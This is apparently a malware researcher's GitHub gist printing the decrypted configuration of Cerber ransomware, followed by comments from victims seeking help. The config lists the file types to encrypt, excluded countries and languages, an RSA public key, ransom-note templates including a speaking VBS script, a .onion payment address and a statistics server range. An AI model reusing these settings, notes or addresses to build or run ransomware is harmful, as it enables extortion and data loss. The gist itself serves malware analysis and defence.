Create a gist now

Instantly share code, notes, and snippets.

@hasherezade /config.json Secret
Last active Feb 2, 2017

What would you like to do?
cerber ransomware
{
"antiav": 1,
"blacklist": {
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
],
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
"folders": [
":\\$recycle.bin\\",": \\$windows.~bt\\",
":\\boot\\",": \\drivers\\",
":\\program files\\",": \\program files (x86)\\",
":\\programdata\\",": \\users\\all users\\",
":\\windows\\","\\appdata\\local\\",
"\\appdata\\locallow\\","\\appdata\\roaming\\",
"\\public\\music\\sample music\\","\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\","\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
]
},
"check": {
"activity": 0,
"country": 1,
"language": 1,
"vmware": 0
},
"debug": 0,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
]
],
"network": 0,
"new_extension": ".cerber",
"max_block_size": 2,
"max_blocks": 5,
"min_file_size": 0,
"multithread": 1,
"rsa_key_size": 576
},
"global_public_key": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==",
"help_files": {
"files": [
{
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1.&nbsp;&nbsp;&nbsp;Download and install the &laquo;Tor Browser&raquo; from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2.&nbsp;&nbsp;&nbsp;Run it<\/h4>\r\n <br \/>\r\n <h4>3.&nbsp;&nbsp;&nbsp;In the &laquo;Tor Browser&raquo; open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4.&nbsp;&nbsp;&nbsp;Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">&laquo;...Quod me non necat me fortiorem facit.&raquo;<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],
"files_name": "# DECRYPT MY FILES #"
},
"ip_geo": [
{
"property_name": "country",
"url": "http:\/\/ipinfo.io\/json"
},
{
"property_name": "country_code",
"url": "http:\/\/freegeoip.net\/json\/"
},
{
"property_name": "countryCode",
"url": "http:\/\/ip-api.com\/json"
}
],
"servers": {
"statistics": {
"data_finish": "{MD5_KEY}",
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"ip": "87.98.128.0\/19",
"port": 6891,
"send_stat": 1,
"timeout": 1020
}
}
}
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H
nQIDAQAB
-----END PUBLIC KEY-----
rhamb38 commented Apr 4, 2016

Could you send me encrypted file for this

I've got some recovered 'getKeys' files from an infected HD, and a 'listFiles' one too. Attached for investigation. I added filetype extension in order to upload since they had none, I can share the originals if necessary; these are not jpeg files, they are of unknown type.

getkeys
listfiles

Can you share how you extracted this from the EXE?

Hi Guys,

I got infected with Ransom virus last weekend and i managed to clean my laptop (apparently) but im stuck with the encrypted files.
Is there any software who can allow me to recover them?
Thank you in advance

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment